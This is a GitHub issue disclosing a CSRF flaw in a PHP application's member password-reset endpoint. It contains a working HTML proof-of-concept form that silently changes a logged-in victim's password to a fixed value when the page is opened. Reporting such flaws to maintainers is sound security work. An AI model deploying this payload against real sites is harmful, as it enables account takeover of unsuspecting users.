Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is one CSRF vulnerability that can Change the common member's password #132

Closed
jiguangsdf opened this issue Apr 23, 2018 · 0 comments

Comments

@jiguangsdf
Copy link

jiguangsdf commented Apr 23, 2018

The vulnerability occurs in
http://localhost/www/index.php?m=member&v=pw_reset
This is the interface of a common member to reset the password
default
The interface does not have CSRF protection, which causes ordinary members to change the login password without knowing their members when they open the Poc page.

poc:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/www/index.php?m=member&v=pw_reset" method="POST">
      <input type="hidden" name="password" value="yuduo" />
      <input type="hidden" name="password2" value="yuduo" />
      <input type="hidden" name="submit" value="ç&#161;&#174;&#32;å&#174;&#154;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

default

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant